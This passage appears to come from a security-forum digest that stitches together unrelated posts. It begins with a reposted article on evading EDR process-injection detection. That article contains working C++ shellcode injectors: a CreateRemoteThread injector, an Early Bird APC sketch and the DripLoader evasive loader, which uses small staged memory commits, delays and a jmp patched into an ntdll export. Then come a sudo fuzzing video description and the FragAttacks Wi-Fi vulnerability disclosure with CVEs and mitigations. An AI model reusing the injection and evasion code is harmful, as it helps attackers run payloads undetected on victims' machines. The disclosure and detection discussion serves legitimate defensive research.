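    LPVOID remote = VirtualAllocEx(hProc, NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!remote) { CloseHandle(hProc); return FALSE; }

    WriteProcessMemory(hProc, remote, payload, len, NULL);

    // Remote thread whose start address lives in unbacked memory - the CRT anomaly described below
    HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)remote, NULL, 0, NULL);
    if (hThread) CloseHandle(hThread);
    CloseHandle(hProc);
    return hThread != NULL;
}
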
https://github.com/elastic/detection-rules Here we have a basic detection for a specific Windows process - msbuild.exe creating a new thread in a remote process. Even though criticality of a potential true positive would be quite high, after testing the rule author decided it is only suitable for low severity (probably due to FP-rate), which likely degrades the rule to an IR label/enrichment in most environments. Such a simple detection rule is unlikely to be part of a mature EDR solution where customers expect to receive alerts for activities like this with high severity, while keeping noise down to allow their analysts to review and classify the important stuff. https://github.com/FalconForceTeam/FalconFriday A more generic, custom MDATP thread creation rule based around the new FileProfile() enrichment function - detects extremely rare files creating threads in remote processes. Very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form, as it would cause substantial amounts of false positives in certain environments, and could prove difficult to maintain. As an example, Defender logs most remote thread creations as labeled events, but low file prevalence is not good enough of an indicator to trigger alert, and there is more advanced logic in play - true for most decent EDRs. CRT events logged by Defender Understanding correlation By "detections" and "alerts" I do not just mean labeled activity which can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint. (I also assume the platform is not incredibly noisy, to the level of it being unusable) This is important to remember as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or generate them based on some risk score analysis often affectionately called "AI", making it difficult to judge whether some particular TTP would be detected in isolation. Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most. On-agent detections, activity and software inventories are often not implemented or limited in scope due to reverse engineering concerns or architecting difficulties. We will exploit this fact later on when building our shellcode injector by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks where IDS solutions tend to detect based on thresholds. For the same reason choosing your EDR vendor based on the numerical results of things like the Mitre evaluation and percentage of coverage - is not a good idea. Among other issues, the test rounds are executed in an unrealistically short time window of around 30 minutes for the whole attack kill chain, which means time correlation of labeled events from the host to a single alert is good enough to score 100% coverage. High fidelity alerts So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection, and forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events. 
For thread creation the most common constraint is thread starting process ≠ hosting process - so monitoring only remote thread creation, usually also limited to those with:
- thread start in an image-"unbacked", MEM_COMMIT-type segment
- the size of that segment being larger than X
and at scale this will still generate a very significant amount of false positives, which may lead to further filtering, for example:
- thread location (target): only in Windows built-in executables, or only a subset of these
- thread initiator (source): only risky executables - unknown hashes, low file prevalence, risky paths (%userprofile%, %temp% etc.), not seen on the network/on the host
- memory page contains suspicious stuff
Machine learning models are often employed to attempt to solve this issue, and so on - these assumptions will differ between vendors, but the idea is to tame thread creation. The less mature solutions in fact often rely on thread creation hooking/callbacks as the only source of data for injection detection. While it is true that for the majority of injection techniques a new thread will be created in the target process at some point, the way in which it's created is often unexpected and makes monitoring infeasible, so relying exclusively on ntdll!NtCreateThread(Ex) hooking/thread creation callbacks is nowadays an easily exploitable design flaw. SetThreadContext In the case of process hollowing or thread hijacking, our target thread has already been created legitimately by the Windows Loader or by the target application locally, and thus there is nothing to detect at thread creation time. This is one of the reasons CobaltStrike execute-assembly uses SetThreadContext instead of CRT injection on the sacrificial process. Once we have the telemetry, at scale it's much easier to detect certain SetThreadContext anomalies than CRT injection, and today in many environments it generates high criticality alerts, rendering fork&run useless in stealthy offensive ops. QueueUserAPC Asynchronous Procedure Calls provide another avenue for avoiding thread creation. An APC can be queued for an existing thread, and is executed once that thread enters an alertable state. In recent years userland hooking evasion has been getting a lot of coverage, and Early Bird injection has popularized the use of APCs for that purpose. The idea is to queue an APC in a newly spawned, suspended process, before the ntdll!LdrpInitializeProcess function has had a chance to run. That way our scheduled routine is executed before the hooking DLLs are loaded into the target process. Once again this technique becomes easy to detect when we stop relying solely on hooking.
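To make the Early Bird idea concrete, here is a minimal sketch (not taken from the post) of the classic flow: spawn a suspended process, write a payload, queue an APC on the primary thread and resume it. The notepad.exe path and the one-byte placeholder payload are illustrative assumptions; error handling and cleanup are omitted for brevity.

#include <windows.h>
#include <cstdio>

int main()
{
    unsigned char shellcode[] = { 0xC3 };   // placeholder (ret), not a real payload

    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = {};

    // 1. Spawn the target suspended, before ntdll!LdrpInitializeProcess runs.
    if (!CreateProcessA("C:\\Windows\\System32\\notepad.exe", nullptr, nullptr,
                        nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr,
                        &si, &pi)) {
        printf("CreateProcessA failed: %lu\n", GetLastError());
        return 1;
    }

    // 2. Allocate and write the payload into the child process.
    LPVOID remote = VirtualAllocEx(pi.hProcess, nullptr, sizeof(shellcode),
                                   MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(pi.hProcess, remote, shellcode, sizeof(shellcode), nullptr);

    // 3. Queue an APC on the (still suspended) primary thread and resume it.
    //    The APC fires during thread initialization, before hooking DLLs load.
    QueueUserAPC((PAPCFUNC)remote, pi.hThread, 0);
    ResumeThread(pi.hThread);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}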
DripLoader

Allocating memory
To bypass any memory allocation based logic we will only commit page-granularity, PageSize-sized pages, which on Windows 10 with a modern processor is 4kB:
- this constant, found in the SYSTEM_INFO structure, tells us the lowest possible size of a VM allocation
- since most legitimate remote VM operations work on a single page, or a few bytes, 4kB is by far the most prevalent allocation size (>95%), making allocations of this size extremely challenging to alert on

To accomplish this we need to deal with some inconveniences:
- we need our shellcode in memory as a continuous byte sequence, which means we cannot let kernel32!VirtualAllocEx choose the base, as it might reserve memory at an address where the other allocations will not fit
- in Windows, any new VM allocation made with kernel32!VirtualAllocEx and similar is rounded up to AllocationGranularity, which is another constant found in SYSTEM_INFO and is usually 64kB
- for example, if we allocate 4kB of MEM_COMMIT | MEM_RESERVE memory at 0x40000000, the whole 0x40000000-0x40010000 (64kB) region will be unavailable for new allocations

Steps we take
1. Pre-define a list of 64-bit base addresses and VirtualQueryEx the target process to find the first region able to fit our shellcode blob:

const std::vector<LPVOID> VC_PREF_BASES{
    (void*)0x00000000DDDD0000, (void*)0x0000000010000000,
    (void*)0x0000000021000000, (void*)0x0000000032000000,
    (void*)0x0000000043000000, (void*)0x0000000050000000,
    (void*)0x0000000041000000, (void*)0x0000000042000000,
    (void*)0x0000000040000000, (void*)0x0000000022000000
};

LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
    MEMORY_BASIC_INFORMATION mbi;
    for (auto base : VC_PREF_BASES)
    {
        VirtualQueryEx(hProc, base, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
        if (MEM_FREE == mbi.State)
        {
            // check that every 64kB region we will need is also free
            uint64_t i;
            for (i = 0; i < cVmResv; ++i)
            {
                LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
                VirtualQueryEx(hProc, currentBase, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
                if (MEM_FREE != mbi.State)
                    break;
            }
            if (i == cVmResv)
            {
                // found suitable base
                return base;
            }
        }
    }
    return nullptr;
}

2. Reserve the required number of full AllocationGranularity (64kB) sized regions, and then loop over those committing 4kB pages to ensure page alignment:

// ANtAVM / ANtWVM / ANtPVM are the loader's wrappers around the
// NtAllocateVirtualMemory / NtWriteVirtualMemory / NtProtectVirtualMemory
// native calls (see the full source on GitHub).

// MEM_RESERVE, NO_ACCESS, 64kB
for (i = 1; i <= cVmResv; ++i)
{
    // sleeps here
    status = ANtAVM(hProc, &currentVmBase, NULL, &szVmResv, MEM_RESERVE, PAGE_NOACCESS);
    if (STATUS_SUCCESS == status)
        vcVmResv.push_back(currentVmBase);
    else
        return 4;
    currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
}

// MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB
for (i = 0; i < cVmResv; ++i)
{
    for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i)
    {
        DWORD offset = (cmm_i * szVmCmm);
        currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);
        ANtAVM(hProc, &currentVmBase, NULL, &szVmCmm, MEM_COMMIT, PAGE_READWRITE);
        // sleeps here
        SIZE_T szWritten{ 0 };
        ANtWVM(hProc, currentVmBase, &shellcode[offsetSc], szVmCmm, &szWritten);
        offsetSc += szVmCmm;
        // sleeps here
        ANtPVM(hProc, &currentVmBase, &szVmCmm, PAGE_EXECUTE_READ, &oldProt);
    }
}

The pages are also written to and individually reprotected with each run to avoid a large RegionSize of the target memory page in the properties of logged VirtualProtectEx events (TiEtw provides this, and hooks can too).

Creating the thread
Now that we have our shellcode in the remote process, we need to initiate its execution. To do this we will use the NtCreateThreadEx native API, which is the ntdll target of CRT and hence very commonly called by legitimate software.
To bypass any detections we will:
- create the new thread from a MEM_IMAGE base address
- moreover, use a known-good module loaded by the Windows Loader: ntdll.dll
- the location will be patched with a far jmp to our shellcode base at the time of thread creation

Note that we do not need to run in a MEM_IMAGE segment, as we only care about the logging of arguments in the TiEtw/hook event. If our shellcode creates a new thread (which would happen for example when using an sRDI beacon.dll), the locally created thread won't be tagged by most EDRs, but it will no longer have ntdll as its start address, which could get it detected by basic Endpoint Protection, and will get it detected by Get-InjectedThread.

Steps we take
1. Figure out the RVA of the function we will hijack:

// ntdll.dll
char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' };
// RtlpWow64CtxFromAmd64
char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' };

LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base)
{
    // mov eax, <vm_base> ; jmp rax - a 5-byte mov is enough because the
    // pre-defined shellcode bases all fit in 32 bits
    unsigned char* b = (unsigned char*)&vm_base;
    unsigned char jmpSc[7]{ 0xB8, b[0], b[1], b[2], b[3], 0xFF, 0xE0 };

    // find the export EP offset in a locally loaded copy of ntdll
    HMODULE hJmpMod = LoadLibraryExA(jmpModName, NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (!hJmpMod)
        return nullptr;
    LPVOID lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);
    DWORD offsetJmpFunc = (DWORD)((DWORD_PTR)lpDllExport - (DWORD_PTR)hJmpMod);
    [...]

2. Find the base of the remote ntdll and calculate the AVA:

    [...]
    LPVOID lpRemFuncEP{ 0 };
    HMODULE hMods[1024];
    DWORD cbNeeded;
    char szModName[MAX_PATH];

    if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded))
    {
        int i;
        for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
        {
            if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char)))
            {
                if (strcmp(PathFindFileNameA(szModName), jmpModName) == 0)
                {
                    lpRemFuncEP = hMods[i];
                    break;
                }
            }
        }
    }
    lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc);
    [...]

3. Overwrite the function prologue with a jmp:

    [...]
    if (NULL == lpRemFuncEP)
        return nullptr;
    SIZE_T szWritten{ 0 };
    // ntdll is mapped at the same base in every process, so the local export
    // address matches the remote lpRemFuncEP computed above
    WriteProcessMemory(hProc, lpDllExport, jmpSc, sizeof(jmpSc), &szWritten);
    return lpDllExport;
}

4. CreateRemoteThread.

The full source and more explanations can be found on GitHub:
xinbailu/DripLoader - Evasive shellcode loader for bypassing event-based injection detection (PoC) - github.com

Result
1. The activity will generate events with the following characteristics:
// reservations
VM_ALLOC: REMOTE: 1, SIZE: 0x10000, TYPE: 0x2000, PROT: 0x01 (-)
// commits
VM_ALLOC: REMOTE: 1, SIZE: 0x1000, TYPE: 0x1000, PROT: 0x04 (rw)
VM_WRITE: REMOTE: 1, SIZE: 0x1000
THREAD_START: REMOTE: 1, SUSPENDED: 0, ACCMSK: 0xFFFF (full), PAGE_TYPE: 0x1000000 (img), LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0
2. State of the target process (assuming the shellcode does not create a thread)

Defense recommendations
Option #1: Monitor injection APIs yourself
- EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected
- aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team

Sursa: https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection
5. Let's investigate some issues we have fuzzing sudo with AFL, and also explain how AFL works. After improving our fuzzing setup even more, we are finally ready to start fuzzing sudo for real. Can we find the vulnerability now?
https://liveoverflow.com/support
Grab the files: https://github.com/LiveOverflow/pwnedit/
milek7's blog: https://milek7.pl/howlongsudofuzz/
Sudo Research Episode 02:
00:00 - Recap
00:39 - Fixing AFL Crash Using LLVM mode
03:32 - Testing the AFL Instrumented Sudo Binary
04:11 - How Fuzzing with AFL works!
06:44 - Can AFL find the crash?
08:06 - Detour: busybox and argv[0]
09:48 - How could we discover "sudoedit"?
10:47 - Can AFL find "sudoedit" through magic?
11:25 - Include argv[0] in the testcases
13:06 - Parallel Fuzzing Setup
-=[ ❤️ Support ]=-
→ per Video: https://www.patreon.com/join/liveover...
→ per Month: https://www.youtube.com/channel/UClcE...
-=[ 🐕 Social ]=-
→ Twitter: https://twitter.com/LiveOverflow/
→ Website: https://liveoverflow.com/
→ Subreddit: https://www.reddit.com/r/LiveOverflow/
→ Facebook: https://www.facebook.com/LiveOverflow/
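A quick aside on the "busybox and argv[0]" detour in the timestamps above: like busybox, sudo changes behaviour depending on the name it was invoked under (sudoedit), which is why a fuzzer that never mutates argv[0] can miss that code path. A simplified sketch of the dispatch pattern, not sudo's actual code:

#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    const char* name = argv[0];
    const char* slash = strrchr(name, '/');   // strip any leading path
    if (slash) name = slash + 1;

    if (strcmp(name, "sudoedit") == 0)
        printf("invoked as sudoedit -> edit mode\n");
    else
        printf("invoked as %s -> normal mode\n", name);
    return 0;
}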
  6. INTRODUCTION 11 May 2021 — This website presents FragAttacks (fragmentation and aggregation attacks) which is a collection of new security vulnerabilities that affect Wi-Fi devices. An adversary that is within radio range of a victim can abuse these vulnerabilities to steal user information or attack devices. Three of the discovered vulnerabilities are design flaws in the Wi-Fi standard and therefore affect most devices. On top of this, several other vulnerabilities were discovered that are caused by widespread programming mistakes in Wi-Fi products. Experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities. The discovered vulnerabilities affect all modern security protocols of Wi-Fi, including the latest WPA3 specification. Even the original security protocol of Wi-Fi, called WEP, is affected. This means that several of the newly discovered design flaws have been part of Wi-Fi since its release in 1997! Fortunately, the design flaws are hard to abuse because doing so requires user interaction or is only possible when using uncommon network settings. As a result, in practice the biggest concern are the programming mistakes in Wi-Fi products since several of them are trivial to exploit. The discovery of these vulnerabilities comes as a surprise, because the security of Wi-Fi has in fact significantly improved over the past years. For instance, previously we discovered the KRACK attacks, the defenses against KRACK were proven secure, and the latest WPA3 security specification has improved. Unfortunately, a feature that could have prevented one of the newly discovered design flaws was not adopted in practice, and the other two design flaws are present in a feature of Wi-Fi that was previously not widely studied. This shows it stays important to analyze even the most well-known security protocols (if you want to help, we are hiring). Additionally, it shows that it's essential to regularly test Wi-Fi products for security vulnerabilities, which can for instance be done when certifying them. To protect users, security updates were prepared during a 9-month-long coordinated disclosure that was supervised by the Wi-Fi Alliance and ICASI. If updates for your device are not yet available, you can mitigate some attacks (but not all) by assuring that websites use HTTPS and by assuring that your devices received all other available updates. DEMO The following video shows three examples of how an adversary can abuse the vulnerabilities. First, the aggregation design flaw is abused to intercept sensitive information (e.g. the victim's username and password). Second, it's shown how an adversary can exploit insecure internet-of-things devices by remotely turning on and off a smart power socket. Finally, it's demonstrated how the vulnerabilities can be abused as a stepping stone to launch advanced attacks. In particular, the video shows how an adversary can take over an outdated Windows 7 machine inside a local network. As the demo illustrates, the Wi-Fi flaws can be abused in two ways. First, under the right conditions they can be abused to steal sensitive data. Second, an adversary can abuse the Wi-Fi flaws to attack devices in someone's home network. The biggest risk in practice is likely the ability to abuse the discovered flaws to attack devices in someone's home network. 
For instance, many smart home and internet-of-things devices are rarely updated, and Wi-Fi security is the last line of defense that prevents someone from attacking these devices. Unfortunately, due to the discovered vulnerabilities, this last line of defense can now be bypassed. In the demo above, this is illustrated by remotely controlling a smart power plug and by taking over an outdated Windows 7 machine. The Wi-Fi flaws can also be abused to exfiltrate transmitted data. The demo shows how this can be abused to learn the username and password of the victim when they use the NYU website. However, when a website is configured with HSTS to always use HTTPS as an extra layer of security, which nowadays close to 20% of websites are, the transmitted data cannot be stolen. Additionally, several browsers now warn the user when HTTPS is not being used. Finally, although not always perfect, recent mobile apps by default use HTTPS and therefore also use this extra protection.

DETAILS
Plaintext injection vulnerabilities
Several implementation flaws can be abused to easily inject frames into a protected Wi-Fi network. In particular, an adversary can often inject an unencrypted Wi-Fi frame by carefully constructing this frame. This can for instance be abused to intercept a client's traffic by tricking the client into using a malicious DNS server as shown in the demo (the intercepted traffic may have another layer of protection though). Against routers this can also be abused to bypass the NAT/firewall, allowing the adversary to subsequently attack devices in the local Wi-Fi network (e.g. attacking an outdated Windows 7 machine as shown in the demo). How can the adversary construct unencrypted Wi-Fi frames so they are accepted by a vulnerable device? First, certain Wi-Fi devices accept any unencrypted frame even when connected to a protected Wi-Fi network. This means the attacker doesn't have to do anything special! Two out of four tested home routers were affected by this vulnerability, several internet-of-things devices were affected, and some smartphones were affected. Additionally, many Wi-Fi dongles on Windows will wrongly accept plaintext frames when they are split into several (plaintext) fragments. Moreover, certain devices accept plaintext aggregated frames that look like handshake messages. An adversary can exploit this by sending an aggregated frame whose start resembles a handshake message and whose second subframe contains the packet that the adversary wants to inject. A vulnerable device will first interpret this frame as a handshake message, but will subsequently process it as an aggregated frame. In a sense, one part of the code will think the frame is a handshake message and will accept it even though it's not encrypted. Another part of the code will instead see it as an aggregated frame and will process the packet that the adversary wants to inject.
A plaintext aggregated frame that also looks like a handshake message ☺
Finally, several devices process broadcast fragments as normal unfragmented frames. More problematic, some devices accept broadcast fragments even when sent unencrypted. An attacker can abuse this to inject packets by encapsulating them in the second fragment of a plaintext broadcast frame.

Design flaw: aggregation attack
The first design flaw is in the frame aggregation feature of Wi-Fi. This feature increases the speed and throughput of a network by combining small frames into a larger aggregated frame.
To implement this feature, the header of each frame contains a flag that indicates whether the (encrypted) transported data contains a single or aggregated frame. This is illustrated in the following figure: Unfortunately, this "is aggregated" flag is not authenticated and can be modified by an adversary, meaning a victim can be tricked into processing the encrypted transported data in an unintended manner. An adversary can abuse this to inject arbitrary network packets by tricking the victim into connecting to their server and then setting the "is aggregated" flag of carefully selected packets. Practically all tested devices were vulnerable to this attack. The ability to inject packets can in turn be abused to intercept a victim’s traffic by making it use a malicious DNS server (see the demo). This design flaw can be fixed by authenticating the "is aggregated" flag. The Wi-Fi standard already contains a feature to authenticate this flag, namely requiring SPP A-MSDU frames, but this defense is not backwards-compatible and not supported in practice. Attacks can also be mitigated using an ad-hoc fix, though new attacks may remain possible. Design flaw: mixed key attack The second design flaw is in the frame fragmentation feature of Wi-Fi. This feature increases the reliability of a connection by splitting large frames into smaller fragments. When doing this, every fragment that belongs to the same frame is encrypted using the same key. However, receivers are not required to check this and will reassemble fragments that were decrypted using different keys. Under rare conditions this can be abused to exfiltrate data. This is accomplished by mixing fragments that are encrypted under different keys, as illustrated in the following figure: In the above figure, the first fragment is decrypted using a different key than the second fragment. Nevertheless, the victim will reassemble both fragments. In practice this allows an adversary to exfiltrate selected client data. This design flaw can be fixed in a backwards-compatible manner by only reassembling fragments that were decrypted using the same key. Because the attack is only possible under rare conditions it is considered a theoretical attack. Design flaw: fragment cache attack The third design flaw is also in Wi-Fi's frame fragmentation feature. The problem is that, when a client disconnects from the network, the Wi-Fi device is not required to remove non-reassembled fragments from memory. This can be abused against hotspot-like networks such as eduroam and govroam and against enterprise network where users distrust each other. In those cases, selected data sent by the victim can be exfiltrated. This is achieved by injecting a malicious fragment in the memory (i.e. fragment cache) of the access point. When the victim then connects to the access point and sends a fragmented frame, selected fragments will be combined (i.e. reassembled) with the injected fragment of the adversary. This is illustrated in the following figure: In the above figure, the adversary injects the first fragment into the fragment cache of the access point. After the adversary disconnects the fragment stays in the fragment cache and will be reassembled with a fragment of the victim. If the victim sends fragmented frames, which appears uncommon in practice, this can be abused to exfiltrate data. This design flaw can be fixed in a backwards-compatible manner by removing fragments from memory whenever disconnecting or (re)connecting to a network. 
Other implementation vulnerabilities Some routers will forward handshake frames to another client even when the sender hasn't authenticated yet. This vulnerability allows an adversary to perform the aggregation attack, and inject arbitrary frames, without user interaction. Another extremely common implementation flaw is that receivers do not check whether all fragments belong to the same frame, meaning an adversary can trivially forge frames by mixing the fragments of two different frames. Additionally, against several implementations it is possible to mix encrypted and plaintext fragments. Finally, some devices don't support fragmentation or aggregation, but are still vulnerable to attacks because they process fragmented frames as full frames. Under the right circumstances this can be abused to inject packets. Assigned CVE identifiers An overview of all assigned Common Vulnerabilities and Exposures (CVE) identifiers can be found on GitHub. At the time of writing, ICASI has a succinct overview containing references to additional info from vendors (the CVE links below might only become active after a few days). Summarized, the design flaws were assigned the following CVEs: CVE-2020-24588: aggregation attack (accepting non-SPP A-MSDU frames). CVE-2020-24587: mixed key attack (reassembling fragments encrypted under different keys). CVE-2020-24586: fragment cache attack (not clearing fragments from memory when (re)connecting to a network). Implementation vulnerabilities that allow the trivial injection of plaintext frames in a protected Wi-Fi network are assigned the following CVEs: CVE-2020-26145: Accepting plaintext broadcast fragments as full frames (in an encrypted network). CVE-2020-26144: Accepting plaintext A-MSDU frames that start with an RFC1042 header with EtherType EAPOL (in an encrypted network). CVE-2020-26140: Accepting plaintext data frames in a protected network. CVE-2020-26143: Accepting fragmented plaintext data frames in a protected network. Other implementation flaws are assigned the following CVEs: CVE-2020-26139: Forwarding EAPOL frames even though the sender is not yet authenticated (should only affect APs). CVE-2020-26146: Reassembling encrypted fragments with non-consecutive packet numbers. CVE-2020-26147: Reassembling mixed encrypted/plaintext fragments. CVE-2020-26142: Processing fragmented frames as full frames. CVE-2020-26141: Not verifying the TKIP MIC of fragmented frames. For each implementation vulnerability we listed the reference CVE identifier. Although each affected codebase normally receives a unique CVE, the consensus was that using the same CVE across different codebases would make communication easier. For instance, by tying one CVE to each vulnerability, a customer can now ask a vendor whether their product is affected by a specific CVE. Using a unique CVE for each codebase would complicate such questions and cause confusion. PAPER Our paper behind the attack is titled Fragment and Forge: Breaking Wi-Fi Through Frame Aggregation and Fragmentation and will be presented at USENIX Security. You can use the following bibtex entry to cite our paper: @inproceedings{vanhoef-usenix2021-fragattacks, author = {Mathy Vanhoef}, title = {Fragment and Forge: Breaking {Wi-Fi} Through Frame Aggregation and Fragmentation}, booktitle = {Proceedings of the 30th {USENIX} Security Symposium}, year = {2021}, month = {August}, publisher = {{USENIX} Association} } USENIX Security Presentation The pre-recorded presentation made for USENIX Security can already be viewed online. 
Note that the target audience of this presentation is academics and IT professionals:

Extra Documents
An overview of all attacks and their preconditions. It also contains two extra examples of how an adversary can: (1) abuse packet injection vulnerabilities to make a victim use a malicious DNS server; and (2) abuse packet injection to bypass the NAT/firewall of a router.
Slides illustrating how the aggregation attack (CVE-2020-24588) works in practice. Performing this attack requires tricking the victim into connecting to the adversary's server. This can be done by making the victim download an image from the adversary's server. Note that JavaScript code execution on the victim is not required.
Detailed slides giving an in-depth explanation of each discovered vulnerability.
Overview slides illustrating only the root cause of each discovered vulnerability.

TOOLS
A tool was made that can test if clients or APs are affected by the discovered design and implementation flaws. It can test home networks and enterprise networks where authentication is done using, e.g., PEAP-MSCHAPv2 or EAP-TLS. The tool supports over 45 test cases and requires modified drivers in order to reliably test for the discovered vulnerabilities. Without modified drivers, one may wrongly conclude that a device is not affected while in reality it is. A live USB image is also available. This image contains pre-installed modified drivers, modified firmware for certain Atheros USB dongles, and a pre-configured Python environment for the tool. Using a live image is useful when you cannot install the modified drivers natively (and using a virtual machine can be unreliable for some network cards). Apart from a tool to test if a device is vulnerable, I also made proof-of-concepts to exploit weaknesses. Because not all devices have currently received updates, these attack scripts will be released at a later point if deemed useful.

Q&A
How can I contact you?
Are you looking for PhD students?
Can I reuse the images on this website?
Why did nobody notice the aggregation design flaw before?
Why was the defense against the aggregation attack (CVE-2020-24588) not adopted?
My device isn't patched yet, what can I do?
Why is Wi-Fi security important? We already have HTTPS.
Will using a VPN prevent attacks?
How did you discover this?
How sure are you that all Wi-Fi devices are affected?
Does this mean every Wi-Fi device is trivial to attack?
How many networks use fragmentation?
How many networks periodically refresh the pairwise session key?
Isn't it irresponsible to release tools to perform the attacks?
Where are all the attack tools?
Do you have example network captures of the vulnerabilities?
How long will you maintain the driver patches needed to run the test scripts?
Why are so many implementations vulnerable to the non-consecutive PN attack?
Why are so many implementations vulnerable to the mixed plaintext/encrypted fragment attack?
Can an implementation be vulnerable to a cache attack without being vulnerable to a mixed key attack?
Can the mixed-key attack be prevented in a backward-compatible manner?
Is the old WPA-TKIP protocol also affected by the design flaws?
Is the ancient WEP protocol also affected by the design flaws?
Can fragmentation attacks be prevented by disallowing small delays between fragments?
Are patches for Linux available?
Did others also discover the plaintext injection issue (CVE-2020-26140)?
Why do you use the same CVE for implementation issues in multiple different codebases?
Why was the embargo so long?
How did you monitor for leaks during the embargo?
Are these vulnerabilities being exploited in practice?
Why did Microsoft already fix certain vulnerabilities on March 9, 2021?
Is the "Treating fragments as full frames" flaw (CVE-2020-26142) also applicable to APs?
Can APs be vulnerable to attacks that send broadcast frames?
Why are some of the tested devices so old?
How did you make macOS switch to the malicious DNS server in the demonstration?
Isn't nyu.edu using HSTS to prevent these kinds of attacks?
How do I reproduce the BlueKeep attack shown in the demonstration?

How can I contact you?
You can reach Mathy Vanhoef on twitter at @vanhoefm or by emailing mathy.vanhoef@nyu.edu.

Are you looking for PhD students?
Yes! Mathy Vanhoef will be starting as a professor at KU Leuven University (Belgium) later this year and is looking for a PhD student. The precise topic you want to work on can be discussed. If you're a master student at KU Leuven you can also contact me to discuss a Master's thesis topic. Note that the DistriNet group at KU Leuven is also recruiting in security-related research fields. If you want to do network research at New York University Abu Dhabi in the Cyber Security & Privacy (CSP) team where the FragAttacks research was carried out, you can contact Christina Pöpper.

Can I reuse the images on this website?
Yes, you can use the logo, illustrations of the aggregation design flaw (mobile version), illustrations of the mixed key design flaw (mobile version), and illustrations of the fragment cache design flaw (mobile version). Thanks goes to Darlee Urbiztondo for designing the logo. You can find more of her awesome graphic works here.

Why did nobody notice the aggregation design flaw before?
When the 802.11n amendment was being written in 2007, which introduced support for aggregated (A-MSDU) frames, several IEEE members noticed that the "is aggregated" flag was not authenticated. Unfortunately, many products already implemented a draft of the 802.11n amendment, meaning this problem had to be addressed in a backwards-compatible manner. The decision was made that devices would advertise whether they are capable of authenticating the "is aggregated" flag. Only when devices implement and advertise this capability is the "is aggregated" flag protected. Unfortunately, in 2020 not a single tested device supported this capability, likely because it was considered hard to exploit. To quote a remark made back in 2007: "While it is hard to see how this can be exploited, it is clearly a flaw that is capable of being fixed." In other words, people did notice this vulnerability and a defense was standardized, but in practice the defense was never adopted. This is a good example that security defenses must be adopted before attacks become practical.

Why was the defense against the aggregation attack (CVE-2020-24588) not adopted?
Likely because it was only considered a theoretical vulnerability when the defense was created. To quote a remark made back in 2007: "While it is hard to see how this can be exploited, it is clearly a flaw that is capable of being fixed." Additionally, the threat model that was used in the aggregation attack, where the victim is induced into connecting to the adversary's server, only became widely accepted in 2011 after the disclosure of the BEAST attack. In other words, the threat model was not yet widely known back in 2007 when the IEEE added the optional feature that would have prevented the attack.
And even after this threat model became more common, the resulting attack isn't obvious. My device isn't patched yet, what can I do? First, it's always good to remember general security best practices: update your devices, don't reuse your passwords, make sure you have backups of important data, don't visit shady websites, and so on. In regards to the discovered Wi-Fi vulnerabilities, you can mitigate attacks that exfiltrate sensitive data by double-checking that websites you are visiting use HTTPS. Even better, you can install the HTTPS Everywhere plugin. This plugin forces the usage of HTTPS on websites that are known to support it. To mitigate attacks where your router's NAT/firewall is bypassed and devices are directly attacked, you must assure that all your devices are updated. Unfortunately, not all products regularly receive updates, in particular smart or internet-of-things devices, in which case it is difficult (if not impossible) to properly secure them. More technically, the impact of attacks can also be reduced by manually configuring your DNS server so that it cannot be poisoned. Specific to your Wi-Fi configuration, you can mitigate attacks (but not fully prevent them) by disabling fragmentation, disabling pairwise rekeys, and disabling dynamic fragmentation in Wi-Fi 6 (802.11ax) devices. Why is Wi-Fi security important? We already have HTTPS. These days a lot of websites and apps use HTTPS to encrypt data. When using HTTPS, an adversary cannot see the data you are transmitting even when you are connected to an open Wi-Fi network. This also means that you can safely use open Wi-Fi hotspots as long as you keep your devices up-to-date and as long as you assure that websites are using HTTPS. Unfortunately, not all websites require the usage of HTTPS (i.e. they're not using HSTS), meaning they remain vulnerable to possible attacks. At home, the security of your Wi-Fi network is also essential. An insecure network means that others might be able to connect to the internet through your home. Additionally, more and more devices are using Wi-Fi to transfer personal files in your local network without an extra layer of protection (e.g. when printing files, smart display screens, when sending files to a local backup storage, digital photo stands, and so on). More problematic, a lot of internet-of-things devices have tons of security vulnerabilities that can be exploited if an adversary can communicate with them. The main thing that 